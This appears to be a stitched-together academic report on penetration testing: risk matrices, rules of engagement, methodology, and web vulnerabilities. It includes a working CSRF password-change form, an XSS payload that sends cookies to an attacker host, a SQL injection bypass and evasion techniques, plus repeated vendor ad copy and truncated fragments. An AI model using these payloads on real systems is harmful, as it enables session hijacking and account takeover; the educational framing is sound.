ratings might be determined based on inputs from the threat likelihood and threat impact categories. The matrix below is a 3 x 3 matrix of threat likelihood (High, Medium, and Low) and threat impact (High, Medium, and Low). Depending on the sites requirements and the granularity of risk assessment desired, some sites may use a 4 x 4 or a 5 x 5 matrix. The latter can include a Very Low /Very High threat likelihood and a Very Low/Very High threat impact to generate a Very Low/Very High risk level. A Very High risk level may require possible system shutdown or stopping of all IT system integration and testing efforts. The sample matrix in Table shows how the overall risk levels of High, Medium, and Low are derived. The determination of these risk levels or ratings may be subjective. The rationale for this justification can be explained in terms of the probability assigned for each threat likelihood level and a value assigned for each impact level. For example, The probability assigned for each threat likelihood level is 1.0 for High, 0.5 for Medium, 0.1 for Low The value assigned for each impact level is 100 for High, 50 for Medium, and 10 for Low.
Risk-Level Matrix
KEY ROLES
Risk management is a management responsibility. This section describes the key roles of the personnel who should support and participate in the risk management process.
Senior Management. Senior management, under the standard of due care and ultimate responsibility
for mission accomplishment, must ensure that the necessary resources are effectively applied to develop the capabilities needed to accomplish the mission. They must also assess and incorporate results of the risk assessment activity into the decision making process. An effective risk management program that assesses and mitigates IT-related mission risks requires the support and involvement of senior management.
Chief Information Officer (CIO). The CIO is responsible for the agencys IT planning, budgeting,
and performance including its information security components. Decisions made in these areas should be based on an effective risk management program.
System and Information Owners. The system and information owners are responsible for ensuring
that proper controls are in place to address integrity, confidentiality, and availability of the IT systems and data they own. Typically the system and information owners are responsible for changes to their IT systems. Thus, they usually have to approve and sign off on changes to their IT systems (e.g., system enhancement, major changes to the software and hardware). The system and information owners must therefore understand their role in the risk management process and fully support this process.
Business and Functional Managers. The managers responsible for business operations and IT
procurement process must take an active role in the risk management process. These managers are the individuals with the authority and responsibility for making the trade-off decisions essential to mission accomplishment. Their involvement in the risk management process enables the achievement of proper security for the IT systems, which, if managed properly, will provide mission effectiveness with a minimal expenditure of resources.
ISSO. IT security program managers and computer security officers are responsible for their
organizations security programs, including risk management. Therefore, they play a leading role in introducing an appropriate, structured methodology to help identify, evaluate, and minimize risks to the IT systems that support their organizations missions. ISSOs also act as major consultants in support of senior management to ensure that this activity takes place on an ongoing basis.
The organizations personnel are the users of the IT systems. Use of the IT systems and data according to an organizations policies, guidelines, and rules of behavior is critical to mitigating risk and protecting the organizations IT resources. To minimize risk to the IT systems, it is essential that system and application users be provided with security awareness training. Therefore, the IT security trainers or security/subject matter professionals must understand the risk management process so that they can develop appropriate training materials and incorporate risk assessment into training programs to educate the end users.
3.3 Roles and Responsibilities of Penetration testers A Security penetration test is an activity in which a test team (hereafter referred to as Pen Tester) attempts to circumvent the security processes and controls of a computer system. Posing as external unauthorized intruders, the test team attempts to obtain privileged access, extract information, and demonstrate the ability to manipulate the target computer in unauthorized ways if it had happened outside the scope of the test. Due to the sensitive nature of the testing, specific rules of engagement are necessary to ensure that testing is performed in a manner that minimizes impact on operations while maximizing the usefulness of the test results. This document will provide guidance and formal documentation for the planning, approval, execution and reporting of external penetration testing.
Procedure: The Pen Test POC will be the individual responsible for coordination of the penetration test activities and schedules, and notify management of planned activities. The Pen Tester POC will be responsible for the penetration test team and be the primary interface with the Pent Test POC for all penetration test activities. The Pen Tester shall develop the documentation and plans for the penetration test (See Appendices A and B) for the Penetration Test Plan Template). As part of this effort, the Pen Tester shall identify and assign roles to the Pen Testers team, identify major milestones for the tasks of the team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path. The Pen Tester shall also identify the steps that will be taken to protect the Test Plan, results, and final deliverables. Conducting the Penetration Testing the Following task shall be performed by the Pen Tester for sites tested: a. Introductory Briefing a. Introduce key players b. Provide overview of Pen Tester capabilities c. Explain objectives of the penetration test d. Review resources, logistics and schedule requirements
e. Schedule technical and administrative face to face meetings b. Executive In-Briefing a. Introduce Pen Tester and key penetration testing staff b. Review objectives of the penetration test c. Review selected target systems d. Review plan and schedule for activities e. Address issues and concerns f. The Penetration Testing Plan and Rules of Engagement shall be signed by all parties prior to the start of testing activities. c. For External Penetration Testing a. Plan and schedule b. Conduct penetration testing with team (reconnaissance, exploitation of vulnerabilities, intrusion, compromise, analysis and recommendations.
d. Analysis of Data and Findings (off-site) a. Correlate data and findings from discoveries and reviews b. Analyze results from penetration testing c. Compare requirements with industry standards d. Document findings and prioritize recommended corrective actions with references to industry standards and requirements e. Provide briefing of findings, recommendations, and associated impacts, to Director of Information Security and the Assistant Vice President of Information Security and Special Projects e. Completion-Briefing a. Summarize findings b. Present final reports c. Discuss external penetration testing results d. Discuss evaluation of test sites IT security program and management structure. e. Discuss overall recommendations The Pen Tester shall remove all data related to the IT Security Penetration test for each site from the Pen Testers computer(s) by a method approved by the UC Information Security Director. All documents, data logs/files, test results and working papers generated by the Pen Tester for the IT Security Penetration test at each site shall not be retained by the Pen Tester.
5. Execution Initial reconnaissance Build up an understanding of the company or organization. This will include interrogating public domain sources such as whois records, finding IP ranges, ISPs, contact names, DNS records, website crawling etc. Service determination The collection of IP addresses enables the investigation of available services. Scans for known vulnerabilities can also be performed using tools such as Nessus or ISS. If firewalls are found, attempts will be made to determine the firewall type. Note that most attacks are not against firewalls, rather through the firewalls at the servers behind (see my previous article on Web application security, (Network Security, August edition). Enumeration The operating system and applications are identified. Banner grabbing, IP fingerprinting, mail bouncing should reveal servers. Usernames, exports, shares etc. are also determined if possible. Gain access Once the testers have more knowledge on the systems, relevant vulnerability information will be researched or new vulnerabilities found in order to (hopefully) give some level of access to the systems. Privilege escalation If an initial foothold can be gained on any of the systems being tested, the next step will be to gain as much privilege as possible i.e. NT Administrator or UNIX root privileges. 6. Reporting summarized findings.
7. External Penetration Report Template Introduction Date carried out Testing Team details 1. Name 2. Contact Nos. 3. Relevant Experience if required. Network Details 1. Peer to Peer, Client-Server, Domain Model, Active Directory integrated 2. Number of Servers and workstations 3. Operating System Details 4. Major Software Applications 5. Hardware configuration and setup 6. Interconnectivity and by what means i.e. T1, Satellite, Wide Area Network, Lease Line Dial up etc. 7. Encryption/ VPN's utilized etc. 8. Role of the network or system Scope of test 1. Constraints and limitations imposed on the team i.e. Out of scope items, hardware, IP addresses. 2. Constraints, limitations or problems encountered by the team during the actual test 3. Purpose of Test curity assurance for the Code of Connection 4. Type of Test
5. Test Type
-Box twork and has been supplied with network diagrams, hardware, operating system and application details etc, prior to a test being carried out. This does not equate to a truly blind test but can speed up the process a great deal and leads to a more accurate results being obtained. The amount of prior knowledge leads to a test targeting specific operating systems, applications and network devices that reside on the network rather than spending time enumerating what could possibly be on the network. This type of test equates to a situation whereby an attacker may have complete knowledge of the internal network. -Box web based test is to be carried out and only the details of a website URL or IP address is supplied to the testing team. It would be their role to attempt to break into the company website/ network. This would equate to an external attack carried out by a malicious hacker. -Box testing team would simulate an attack that could be carried out by a disgruntled, disaffected staff member. The testing team would be supplied with appropriate user level privileges and a user account and access permitted to the internal network by relaxation of specific security policies present on the network i.e. port level security. 1. Executive Summary (Brief and Non-technical)
- problem area
- problem area
Methodology is a map using which you will reach your final destination (end of test) and without a methodology the testers might get lost (reach the abovementioned results).
Proposed methodology
Proposed methodology model
While there are several available methodologies for you to choose from, each penetration tester must have their own methodology planned and ready for most effectiveness and to present to the client. In the prosposed methodology planning, there are 3 main figures that must be fully understood and followed: 1. Information. Information gathering is essentially using the Internet to find all the information you can about the target (company and/or person) using both technical (DNS/WHOIS) and nontechnical (search engines, news groups, mailing lists etc) methods. Whilst conducting information gathering, it is important to be as imaginative as possible. Attempt to explore every possible avenue to gain more understanding of your target and its resources. Anything you can get hold of during this stage of testing is useful: company brochures, business cards, leaflets, newspaper adverts, internal paperwork, and etc. Information gathering does not require that the assessor establishes contact with the target system. Information is collected (mainly) from public sources on the Internet and organizations that hold public information (e.g. tax agencies, libraries, etc.) Information gathering section of the penetration test is important for the penetration tester. Assessments are generally limited in time and resources. Therefore, it is critical to identify points that will be most likely vulnerable, and to focus on them. Even the best tools are useless if not used appropriately and in the right place and time. Thats the reason why experienced testers invest an important amount of time in information gathering. [4] There are commonly 2 types of penetration testing: When the information about the organization is Closed (Black box) - the pen-tester performs the attack with no prior knowledge of the infrastructure, defence mechanisms and
communication channels of the target organization. Black box test is a simulation of an unsystematic attack by weekend or wannabe hackers (script kiddies). And when the information is Shared (White box) - the pen-tester performs the attack with full knowledge of the infrastructure, defence mechanisms and communication channels of the target organization. White box test is a simulation of a systematic attack by well prepared outside attackers with insider contacts or insiders with largely unlimited access and privileges. If the penetration testers are using the Black Box approach, then Information gathering must be planned out, because information gathering is one of the most important processes in penetration testing and its one of first phases in security assessment and is focused on collecting as much information as possible about a target application. This task can be carried out in many different ways: by using public tools (search engines), scanners, sending simple HTTP requests, or specially crafted requests, it is possible to force the application to leak information, e.g., disclosing error messages or revealing the versions and technologies used. If the penetration testers are using the White Box approach, then the tester should target the information gathering procedure based on the scope (e.g. the clinet might give all the required information, and might not want the testers to search for other information) Basically there are 4 phases to information gathering: Phase 1. The first step in information gathering is - network survey. A network survey is like an introduction to the system that is tested. By doing that, you will have a network map, using which you will find the number of reachable systems to be tested without exceeding the legal limits of what you may test. But usually more hosts are detected during the testing, so they should be properly added to the network map. The results that the tester might get using network surveying are: - Domain Names - Server Names - IP Addresses - Network Map - ISP / ASP information - System and Service Owners Network surveying can be done using TTL modulation(traceroute), and record route (e.g. ping -R), although classical 'sniffing' is sometimes as effective method Phase 2. 2nd phase is the OS Identification (sometimes referred as TCP/IP stack fingerprinting). The determination of a remote OS type by comparison of variations in OS TCP/IP stack implementation behavior. In other words, it is active probing of a system for responses that can distinguish its operating system and version level. The results are: - OS Type - System Type - Internal system network addressing The best known method for OS identification is using nmap Phase 3. Next step is port scanning Port scanning is the invasive probing of system ports on the transport and network level. Included here is also the validation of system reception to tunneled, encapsulated, or routing protocols. Testing for different protocols will depend on the system type and services it offers. Each Internet enabled system has 65,536 TCP and UDP possible ports (incl. Port 0). However, it is not always necessary to test every port for every system. This is left to the discretion of the test team. Port numbers that are important for testing according to the service are listed with the task. Additional port numbers for scanning should be taken from the Consensus Intrusion Database Project Site. The results that the tester might get using Port scanning are:
- List of all Open, closed or filtered ports - IP addresses of live systems - Internal system network addressing - List of discovered tunneled and encapsulated protocols - List of discovered routing protocols supported Methods include SYN and FIN scanning, and variations thereof e.g. fragmentation scanning Phase 4. Services identification. This is the active examination of the application listening behind the service. In certain cases more than one application exists behind a service where one application is the listener and the others are considered components of the listening application. A good example of this is PERL installed for use in a Web application. In that case the listening service is the HTTP daemon and the component is PERL. The results of service identification are: - Service Types - Service Application Type and Patch Level - Network Map The methods in service identification are same as in Port scanning There are two ways using which you can perform information gathering: 1. 1st method of information gathering is to perform information gathering techniques with a 'one to one' or 'one to many' model; i.e. a tester performs techniques in a linear way against either one target host or a logical grouping of target hosts (e.g. a subnet). This method is used to achieve immediacy of the result and is often optimized for speed, and often executed in parallel (e.g. nmap). 2. Another method is to perform information gathering using a 'many to one' or 'many to many' model. The tester utilizes multiple hosts to execute information gathering techniques in a random, rate-limited, and in non-linear way. This method is used to achieve stealth. (Distributed information gathering) 2. Team. Penetration testing is most effective if its a team of professional, which all have their roles and responsibilities appointed and all know what he/she must do and how to do it. In penetration testing, as in any sphere, each team member must know his/her part of the team, and should follow the affixed procedure (e.g. network administrator, should not be searching for vulnerabilities through the web-site) in order for the test to be quick, efficient and less time consuming. (e.g. security consultant is responsible to make the report clear and understandable, in order for the technicians to be more focused on testing rather than reporting) 3. Tools. And the last most important part of the test is the toolkit. Each penetration testers have their toolset to perform a penetration test. These tools are usually chosen in order to make their work most effective (a test cannot be effective if the owner of the system assigns tools, which the testers are not familiar with). There are many tools available, and many of them are available for free usage, but the penetration testers must have excellent usage at least with some of them, rather that know most of them on an average level. It is also vital for the testers to choose their toolkits wisely, since this not only one area to perform a penetration test in (software development, network). For example, network vulnerability scanners that try to evade detection by IDS and IPS devices would normally not be useful for software development. So the testers should choose the toolkit with features that are suitable for them (e.g. Configurability, Extensibility). 4. Policy 1. The Company must provide the penetration tester with certain required information regarding the scope and range of the tests and all information provided must be true and accurate. This is done for the purpose of:
- Accuracy; e. g. with the defined scope the test will be pin-pointed, and the tester will have a test-map which to follow throughout the test - Confidentiality; e. g. with the defined ranges of the test, the tester will not be testing and/or acquiring the information which is confidential even for the tester - Resource saving; e. g. with the defined scope and range, the tester will not be spending time and human resources on testing non-required targets 2. Penetration tester must gather all the information required for the testing only within the defined boundaries of the test and all of this information must be reported completely at the end of the test. Purpose: - Privacy; e. g. all of the gathered information must be reported so that there will be no information leaks 3. The Company and the tester must agree upon a timing table of the tests Purpose: - Safety; e. g. so that tests will be carried in a non-harmful for them period (a DoS attack will not be carried out in a busy network period) International Journal of of Grid and Distributed Computing 4.1 The penetration tester must be held responsible for all the damage that occurs to the reason of testing. The penalty for the damage (data loss, equipment destruction) should be agreed upon and stated in the contract prior to the testing. 4.2 The damage that has occurred not to the fault of the test is the responsibility of the Company There are also cases that damage is occurred which is not the responsibility of the tester, for example the DoS attack was carried out, which led to financial loss (because of no service), but the timing of the DoS attack was not agreed upon. This is why timing is important (refer to policy rule #3) 5. The Company and the penetration tester must keep all the information of the test, including the contract as confidential. No information about contract, terms, fees should be released by either party. Information about the Companys business or computer systems or security situation that the tester obtains during the course/and after the completion of the test must not be released to any third party without prior written approval. 6. The provider may assign or sub-contract all or any part of its rights and obligations under a contract to third parties without the Companys prior written consent. Some penetration testing companies assign different stages of testing to third-parties, this does not have to be approved by the client. The penetration tester utilizes a team approach employing experts to test different security aspects. All sub-contractors employed by the penetration tester shall, however, be bound by the terms and conditions of a same contract as between the Company and the penetration tester. 7.1 The penetration tester and the Company may from time to time impart to each other certain confidential information relating to each others business including specific documentation. There are times when tester might need additional information (contacts, accounts), and/or the client might provide additional information (e. g. passwords, user accounts) during the testing. All of this information should keep confidentiality as information given prior to the test, or acquired during the testing (refer to policy rule #5) 7.2 Each party must use such confidential information only for the purposes of the test and that it must not be disclosed directly or indirectly to any third party. 8. After the completion of the testing and reporting the provider has no rights to
the information or the data of the Company, unless approved by the Company. During the testing, the penetration is granted access, and/or acquires access to confidential information. After the completion of the test, the tester no longer has right to the information, or any further testing, unless the client of the test approves. 9. The penetration tester holds no responsibility for the loss and/or damage that is occurred in case if a real attack is occurred during the testing period. If a real attack occurred during the testing period, the tester holds no responsibility to that attack, however if that attack occurred to the result of information leak from the tester, then the tester is responsible for the damage.
Vulnerability Assessment: The First Steps There are a number of reasons organizations may need to conduct a vulnerability assessment. It could be simply to conduct a check-up regarding overall web security risk posture. But if organization has more than a handful of applications and a number of servers, a vulnerability assessment of such a large scope could be overwhelming. The first thing needs to decide is what applications need to be assessed, and why. It could be part of PCI DSS requirements or the scope could be the web security of a single,ready-to-be deployed application etc. Web Application Vulnerability Types Detecting web application vulnerabilities, we choose the following: 1. Cross-Site Request Forgery (CSRF), 2. SQL injection (SQLI) 3.Cross-site scripting (XSS) as our primary vulnerability detection targets for two reasons: a) They exist in many Web Applications, and b) Their avoidance and detection are still considered difficult. Here will give a brief description of vulnerability followed by our proposed detection and prevention models.
CSRF Detection
Web application offers messaging between users. Upon login it sets a large, unpredictable session ID cookie which is used to authenticate further requests by users. One of the features of website is that users can send each other links inside their text messages. It uses HTTPS to keep messages, credentials, and session identifiers secret from network eavesdroppers. An incoming messages frame is displayed to users who have logged in. This frame uses JavaScript or a refresh tag to execute the Check for new messages action every 10 seconds on behalf of the user. New
messages appear in this frame, and include the name of the sender and the text of the message. Text that is formatted as an HTTP or HTTPS URL is automatically converted into a link. The Send a message action takes two parameters: recipient (a user name or all), and the message itself which is a short string. To determine if this application is susceptible to CSRF, examine the Send a message action (although the Logout action is also sensitive and might be targeted by attackers for exploitation). When I do this, we find the following simple HTML form is submitted to send messages: <form action="GoatChatMessageSender" method="GET"> <INPUT type="radio value="Bob" name="Destination">Bob<BR> <INPUT type="radio" name="Destination" value="Alice">Alice<BR> <INPUT type="radio" name="Destination" value="Malory">Malory<BR> <INPUT type="radio" name="Destination" value="All">All<BR> Message: <input type="text" name="message" value="" /> <br><input type="submit" name="Send" value="Send Message" /> </form> Form for sending messages: Here is what it looks like in its frame: From looking at this form we can figure out that when users wish to send the message Hi Alice to Alice, the following URL will be fetched when the user clicks Send message. Hidden Form Based CSRF Exploit The exploitation of a system which allows password changes, but does not require the user old password. In this example the target servlet requires an HTTP POST, and the attacker creates a selfsubmitting form to full fill this requirement. Note that this exploit is not as reliable as the image based request. Because the users browser (or at least the tiny frame this exploit is placed in) is actually directed to the targeted site. Users with disabled browser scripting wont be exploited, and depending on the users browser and configuration form submissions to other sites may result in a security popup box. <HTML> <BODY> <form method="POST" id="evil" name="evil" action="https: //www.yahoo.com/ VictimApp/PasswordChange"> <input type=hidden name="newpass" value="badguy"> </form> <script>document.evil.submit()</script> </BODY> </HTML> Even if scripting is disabled however a close this window link that is actually a submit button may trick a user into submitting the form on the attackers behalf.
INSERT permission on table, even if table is mentioned in a SELECT sub-query of an INSERT statement, we will discover and flag the violation.
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against SQL Injection attacks, cross-site scripting, website defacement and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
Enterprise-class security against known and emerging hacking attacks Solutions for Hosting, Enterprise and SMB/SME Supports multiple platforms and technologies - IIS, Apache, Cloud ... Central Management console for easy control over multiple dotDefender installations Open API for integration with management platforms and other applications
malicious hacker, it was delivered to the browser on behalf of the Web application. Such scripts can therefore be used to read the Web applications cookies and to break through its security mechanisms.
DOM-based XSS
DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML contents which is called the Document Object Model (DOM). JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting upon the DOM. A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping, entirely on client side. Example Attack Scenario: The application uses un-trusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXTvalue='" + request.getParameter("CC") + "'>"; The attacker modifies the CC parameter in their browser to: '><script>document.location='http://www.attacker.com/cgibin/ cookie.cgi?'%20+document.cookie</script>. This causes the victims session ID to be sent to the attackers website, allowing the attacker to hijack the users current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ.
and trusted pages that contain ActiveX controls, Java Applets, Flash scripts, and JavaScript are carefully chosen as crawl targets. As they are crawled, normal behavior is studied and recorded. Our results reveal that during start-up, Microsoft Internet Explorer (IE) 1. Locates temporary directories. 2. Writes temporary data into registry. 3. Loads favourite links and history lists. 4. Loads the required DLL and font files. 5. Creates named pipes for internal communication. During page retrieval and rendering, IE 1. Checks registry settings. 2. Writes files to the users local cache. 3. Loads a cookie index if a page contains cookies. 4. Loads corresponding plug-in executables if a page contains plug-in scripts.
Cookie Security
Other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker spoofs their IP address, is behind the same NATed IP address or web proxyor simply opts to tamper with the site or steal data through the injected script, instead of attempting to hijack the cookie for future use.
Many operators of particular web applications (e.g. forums and webmail) wish to allow users to utilize some of the features HTML provides, such as a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as <b>very</b> large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). To stop XSS when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML policy engine to ensure that it does not contain XSS.
User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations The ability for attackers to track your visitors web browsing behavior infringing on their privacy Abuse of credentials and trust Keystroke logging of your sites visitors Misuse of server and bandwidth resources The ability for attackers to exploit your visitors browser Data theft Web site defacement and vandalism Link injections Content theft
Web sites that have been exploited using XSS attacks have also been used to:
Probe the rest of the intranet for other vulnerabilities Launch Denial of Service attacks Launch Brute Force attacks
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
Easy installation on Apache and IIS servers Strong security against known and emerging hacking attacks Best-of-breed predefined security rules for instant protection Interface and API for managing multiple servers with ease Requires no additional hardware, and easily scales with your business
If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.
Changes to or deletion of highly sensitive business information. Steal customer information such as social security numbers, addresses, and credit card numbers. Financial losses Brand damage Theft of intellectual property Legal liability and fines
Terminating queries using quotes, double-quotes, SQL comments Using stored procedures Database manipulation commands such as TRUNCATE, DROP Using CASE WHEN, EXEC to run nested queries Utilizing SQL injection to create Buffer Overflow attacks within the database server Delivering SQL queries via XML and Web Services Blindfolded SQL Injection techniques: o Blindfolded injection techniques using Boolean queries and WAITFOR DELAY o Comparison queries using commands such as BETWEEN, LIKE, ISNULL IDS signature evasive SQL Injection techniques: o Using CONVERT & CAST commands to mask the attack payload Using Null bytes to break the signature pattern o Using HEX encoding mixtures o Using SQL CHAR() to represent ASCII values as numbers
For example, the attacker decides to go with a basic attack using: 1 = 1-What happens when this is entered into an input box is that the server recognizes 1 = 1 as a true statement. Since -- is used for commenting, everything after that is ignored making it possible for the attacker to gain access to the database. You can see precisely how this attack works on our SQL injection example page.
The threat posed by SQL injection attacks are not solitary. Combined with other vulnerabilities like crosssite scripting, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming.
Cleaning Up
The cleaning up process is done to clear any mess that has been made as a result of the penetration test. A detailed and exact list of all actions performed during the penetration test must be kept. This is vital so that any cleaning up of the system can be done. The cleaning up of compromised hosts must be done securely as well as not affecting the organizations normal operations. The cleaning up process should be verified by the organizations staff to ensure that it has been done successfully. Bad practices and improperly documented actions during penetration test will result in the cleaning up process being left as a backup and restore job for the organization thus affecting normal operations and taking up its IT resources.A good example of a clean up process is the removal of user accounts on a system previously created externally as a result of the penetration test. It is always the penetration testers responsibility to inform the organization about the changes that exists in the system as a result of the penetration test and also to clean up this mess.
Even if the penetration team did not manage to break into the organization this does not mean that they are secure. Penetration testing is not the best way to find all vulnerabilities. Vulnerability assessments that include careful diagnostic reviews of all servers and network devices will definitely identify more issues faster than a "black box" penetration test. Penetration tests are conducted in a limited time period. This means that it is a "snapshot of a system or network's security. As such, testing is limited to known vulnerabilities and the current configuration of the network. Just because the penetration test was unsuccessful today does not mean a new weakness will not be posted on Bugtraq and exploited in the near future. Also it does not mean that if the testing team did not discover the any vulnerability in the organizations system, it does not mean that hackers or intruders will not. As business has transformed over the years to a more service-oriented environment, a significant increase in trust has been placed on outside organizations to manage business processes and corporate data. Do you truly know how secure your third party service providers networks and / or web applications are? What about your own network or web applications? Data breaches are occurring at an all-time high. Network securitys increased awareness at the C level is also helping IT departments to increase their budgets and move to their requests to the top of every corporations annual budget. The need for accessible on-demand data used in real time decision making and increased focus on business efficiencies has resulted in vital / confidential data being accessible, stored, and transferred electronically across corporate networks and the internet. Attempted breaches occur every day through the use of automated bots and targeted attacks, but without proper testing, how do you know if your business or a third party service provider of yours is susceptible to attack?
Delays in patching security flaws of operating systems and software; Use of unsecure access protocols; Lapses in licensing for antivirus, IDS, IPS, and other vulnerability identification and prevention tools; Weak passwords for firewalls and other exposed services; A loose software management policy; Weak secure coding guidelines and QA review processes; and Lapses in IT Managements adherence to security controls and protocols.
All of these issues are preventable by ensuring a proper security maintenance program with sufficient resources dedicated to its execution is in place. A regularly scheduled external and / or internal vulnerability assessment can serve to validate operation of current security practices and identify new issues that may have been introduced as a result of an upgrade or system change.
Regulatory Compliance
Software as a Services (SaaS) offerings, application service providers, 3rd party colocation / hosting facilities, and especially corporate networks, have become prime targets for hackers, and the number of incidents increasing yearly, as they are treasure troves for confidential and business data that are targeted by criminals. This has elevated the importance of IT Security in the enterprise and within various compliance and regulatory frameworks.
Recognized frameworks include, at minimum, requirements that a regular vulnerability assessment of either the production network and / or web application be performed. Depending upon your environment the following frameworks potentially required these assessments:
Sarbanes-Oxley (SOX); Statements on Standards for Attestation Engagements 16 (SSAE 16 / SOC 1); Service Organization Controls (SOC) 2 / 3; Payment Card Industry Data Security Standard (PCI DSS); Health Insurance Portability and Accountability Act (HIPAA); Gramm Leach Bliley Compliance (GLBA); and Federal Information System Controls Audit Manual (FISCAM).
Inappropriate SSL Certificate (expired, not properly configured, self-signed, etc.); Unknown or unnecessarily open shares; Dormant user accounts that have not expired; Unnecessary open ports; Rogue devices connected to your systems; Dangerous script configurations; Servers allowing use of dangerous protocols; Incorrect permissions on important system files; Running of unnecessary, potentially dangerous services; Default passwords in use; and Unpatched services / applications.
How Is Our Executive Leadership Informed About the Current Level and Business Impact of Cyber Risks to Our Company? What Is the Current Level and Business Impact of Cyber Risks to Our Company? What Is Our Plan to Address Identified Risks? How Does Our Cyber Security Program Apply Industry Standards and Best Practices? How Many and What Types of Cyber Incidents Do We Detect In a Normal Week? What is the Threshold for Notifying Our Executive Leadership? How Comprehensive Is Our Cyber Incident Response Plan? How Often Is It Tested?
Penetration testing is an important part of a companys defence against cyber attacks. Penetration testing may be referred to as ethical hacking. It is a means to check systems, buildings and people are secure by simulating criminal attacks. Penetration testing should reflect a measured approach to risk. Think of things from a criminals point of view. How much time, effort and money would criminals invest to gain access to your assets? How much time, effort and money are YOU willing to invest to ensure they cant?
Successful cyber attacks result in brand damage, financial loss and recovery costs. It is important to ensure your organization is, and remains resilient to such attacks.
It is helpful to take an asset-centric point of view, and focus on defending the assets or data that matter most to your company. Usually Pentesters take the following approach:
Scoping where are your assets, what are they and whom can access them? Gap Analysis what are the strengths and weaknesses in your organisation? Risk Assessment how likely are your gaps to become targets? Penetration Test Scoping what test plan, when executed, will give your company assurance that systems are secure? Remediation following a test, how are issues addressed? Improvement - what policies and processes can be fixed so issues do not recur?
A good penetration testing firm will be able to guide you through this and ensure you select the right balance to cost, risk and security. There is nothing worse than undergoing year on year penetration testing, only to find the same issues. Pen testers want to see our clients develop and improve their security postures, and not to remain targets.
It is not difficult to see a business being brought to its knees by what appears to be an innocuous theft or other lapse in security. It is crucial that businesses put good holistic security measures in place. They
should include physical, Personnel and Information security measures. However for them to be effective they should be regularly tested to ensure they are appropriate and proportionate to the threat. Independent Commercial Physical Penetration Tests are an ideal means of checking that the security measures work as intended.
Reputational Analysis
The most secure infrastructures in the world are still subject to the threat of deliberate or negligent human activity, and whilst human error can never be truly eliminated, your resilience against intelligence gathering activities can be measured through a social engineering assessment, which typically includes: a. Using telephony systems to gain potentially sensitive information from employees. b. Using social media sites to gain employee trust. c. Posing as a customer, senior manager or trusted third party to glean information. Furthermore, a degree of sensitive information may also be available on publicly available websites (a very high level example being Google), attacks may be being planned against you via IRC channels and employees may be breaching confidentiality clauses through knowingly or unknowingly releasing sensitive information about your company. Source Code Review is an essential part of best practice software security and also compliance regulations, such as PCI DSS and PA DSS. It also helps to eliminate serious software flaws that might lead to instability or affect the integrity of data. We should provide both static and dynamic testing of source code, to ensure applications offer a high level of protection of confidential data and meet ever stricter compliance requirements. your code complies with OWASP top 10, and is not prone to:
Unvalidated input Broken access control (for example, malicious use of user IDs) Broken authentication and session management (use of account credentials and session cookies) Cross-site scripting (XSS) attacks Buffer overflows Injection flaws (for example, structured query language (SQL) injection) Improper error handling Insecure storage Denial of service Insecure configuration management
a) Eliminate the risk of SQL Injection, XSS and CSRF style attacks b) Analyse millions of lines of code across multiple modules c) Interpret security flaws in a a wide range of languages, including C and its derivatives, asp, asp.net, Visual Basic, vb.net, C#, Java, Perl, Python, PHP and Delphi. d) Pinpoint vulnerabilities and provide precise, detailed remediation advice for rapid fixes e) Identify design areas and recommend best practice f) Advise on counter measures such as Web Application Firewalls
Secure Software Concepts security implications in software development and for software supply chain integrity Secure Software Requirements capturing security requirements in the requirements gathering phase Secure Software Design translating security requirements into application design elements Secure Software Implementation/Coding unit testing for security functionality and resiliency to attack, and developing secure code and exploit mitigation Secure Software Testing testing for security functionality and resiliency to attack Software Acceptance security implication in the software acceptance phase Software Deployment, Operations, Maintenance and Disposal security issues around steady state operations and management of software
A holistic approach to software security needs Advice regarding designing, developing and deploying secure software Knowledge on the latest software security technologies Assurance of compliance to regulations Compliance to your policy & procedures set
Confidentiality, integrity, availability, authentication, authorization and auditing the core tenets of security must become requirements in your Software Development Lifecycle. Without this level of commitment, information is placed at risk. Incorporating security early and maintaining it throughout all the different phases of the Software Development Lifecycle has proven to be 30-100 times less expensive and incalculably more effective than the release and patch methodology used frequently today.
CHAPTER 5 CONCLUSION
